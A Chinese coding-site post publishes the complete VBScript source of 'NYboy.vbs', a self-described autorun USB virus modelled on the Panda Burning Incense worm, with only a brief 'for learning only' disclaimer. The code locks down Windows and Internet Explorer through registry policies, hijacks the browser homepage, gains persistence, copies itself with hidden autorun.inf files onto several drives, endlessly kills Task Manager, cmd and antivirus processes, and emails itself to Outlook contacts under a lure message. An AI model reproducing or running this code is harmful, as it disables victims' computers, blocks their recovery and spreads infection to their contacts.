欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

NYboy.vbs病毒源代码公布,我来模拟熊猫烧香

程序员文章站 2022-03-20 14:13:02
使用过u盘的朋友都知道u盘病毒是一种autorun自运行病毒,当双击时触发病毒体,会复制自身到c d e和系统盘system32下等盘符,(生成exe文...
使用过u盘的朋友都知道u盘病毒是一种autorun自运行病毒,当双击时触发病毒体,会复制自身到c d e和系统盘system32下等盘符,(生成exe文件和一个autorun.inf文件),同时修改注册表,当点击c盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒 和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负on error resume next
dim fso,wsh,myfile,ws,pp,fsofolder 
set wsh=wscript.createobject("wscript.shell") 
set fso=wscript.createobject("scripting.filesystemobject") 
set myfile=fso.getfile(wscript.scriptfullname)  
'修改注册表(开始菜单里面的东西和ie各项设置)
wsh.regwrite "hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue",0,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\start page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\search page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\default_page_url","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\microsoft\internet explorer\main\default_search_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\start page","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\default_page_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\default_search_url","http://ruanji03.ys168.com"
wsh.regwrite "hkey_users\.default\software\microsoft\internet explorer\main\search page","http://ruanji03.ys168.com"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword"
wsh.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubscriptions",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","c:\nyboy.vbs" 
wsh.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry",""
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\notraycontextmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\startmenulogoff",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosmhelp",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nonethood",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nowinkeys",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocsmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofind","1","reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nowindowsupdate",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofavoritesmenu",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocshistory",1,"reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools","1","reg_dword"
wsh.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.regwrite "hklm\software\classes\drive\shell\auto\command\","c:\nyboy.bat '%1'" 
wsh.regwrite "hkcr\drive\shell\","auto"
wsh.regwrite "hkcr\drive\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hklm\software\classes\directory\shell\","auto"
wsh.regwrite "hkcr\directory\shell\auto\command\","c:\nyboy.bat '%1'"
wsh.regwrite "hklm\software\classes\directory\shell\auto\command\","c:\nyboy.bat '%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.regwrite "hkcr\exefile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\txtfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\dllfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\batfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hkcr\inifile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\exefile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\txtfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\dllfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\batfile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\inifile\defaulticon\","c:\1.ico" 
wsh.regwrite "hklm\software\classes\.reg\","txtfile"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","你好啊,大兵和你开个小小的玩笑"
wsh.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","你已经中毒了,赶快杀毒或者与qq252287438联系"
'复制自身到c,d,e,f,u盘
myfile.copy "c:\" 
myfile.copy "d:\" 
myfile.copy "e:\"
myfile.copy "f:\" 
myfile.copy "i:\" 
myfile.attributes=34 
'定义autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
if fso.fileexists("c:\autorun.inf") then 
set objfolder = fso.getfile("c:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>c:\autorun.inf"_  
&"&& echo open=nyboy.bat >>c:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>c:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>c:\autorun.inf"_  
&"&& echo shell=auto>>c:\autorun.inf"_ 
&"&& attrib +h +s +r c:\autorun.inf" 
set autobatc=fso.createtextfile("c:\nyboy.bat",1,ture)
autobatc.writeline("nyboy.vbs")
end if
if fso.fileexists("d:\autorun.inf") then 
set objfolder = fso.getfile("d:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>d:\autorun.inf"_  
&"&& echo open=nyboy.bat >>d:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>d:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>d:\autorun.inf"_  
&"&& echo shell=auto>>d:\autorun.inf"_ 
&"&& attrib +h +s +r d:\autorun.inf" 
set autobatd=fso.createtextfile("d:\nyboy.bat",1,ture)
autobatd.writeline("nyboy.vbs")
end if
if fso.fileexists("e:\autorun.inf") then 
set objfolder = fso.getfile("e:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>e:\autorun.inf"_  
&"&& echo open=nyboy.bat >>e:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>e:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>e:\autorun.inf"_  
&"&& echo shell=auto>>e:\autorun.inf"_ 
&"&& attrib +h +s +r e:\autorun.inf" 
set autobate=fso.createtextfile("e:\nyboy.bat",1,ture)
autobate.writeline("nyboy.vbs")
end if
if fso.fileexists("f:\autorun.inf") then 
set objfolder = fso.getfile("f:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>f:\autorun.inf"_  
&"&& echo open=nyboy.bat >>f:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>f:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>f:\autorun.inf"_  
&"&& echo shell=auto>>f:\autorun.inf"_ 
&"&& attrib +h +s +r f:\autorun.inf" 
set autobatf=fso.createtextfile("f:\nyboy.bat",1,ture)
autobatf.writeline("nyboy.vbs")
end if
if fso.fileexists("i:\autorun.inf") then 
set objfolder = fso.getfile("i:\autorun.inf") 
else 
wsh.run "cmd /c echo [autorun]>>i:\autorun.inf"_  
&"&& echo open=nyboy.bat >>i:\autorun.inf"_  
&"&& echo shellexecute=nyboy.bat >>i:\autorun.inf"_  
&"&& echo shell\auto\command=nyboy.bat>>i:\autorun.inf"_  
&"&& echo shell=auto>>i:\autorun.inf"_ 
&"&& attrib +h +s +r i:\autorun.inf" 
set autobatf=fso.createtextfile("i:\nyboy.bat",1,ture)
autobatf.writeline("nyboy.vbs")
end if
'设置病毒体属性为 系统 只读 隐藏
wsh.run "cmd /c attrib +h +s +r c:\nyboy.bat"_  
&"&& attrib +h +s +r d:\nyboy.bat"_  
&"&& attrib +h +s +r e:\nyboy.bat"_  
&"&& attrib +h +s +r f:\nyboy.bat"_  
&"&& attrib +h +s +r i:\nyboy.bat"
'强制结束某些进程,比如qq,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do 
set ws=getobject("winmgmts:\\.\root\cimv2") 
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or name = 'qq.exe'or name = 'notepad.exe'or name = 'iexplore.exe'or name = 'cmd.exe'or name = 'avp.exe'or name = 'winrar.exe'or name = 'realplay.exe'or name = 'winword.exe'") 
for each i in pp 
i.terminate()
wscript.sleep 100 
next 
loop
'使病毒可以靠邮件传播
set ol=createobject("outlook.application")
on error resume next
for x=1 to 5
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi").addresslists(1).addressentries(x)
mail.subject="今晚你来吗?"
mail.body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运!              qq交友频道"
mail.attachments.add("c:\nyboy.vbs")
mail.send
next
ol.quit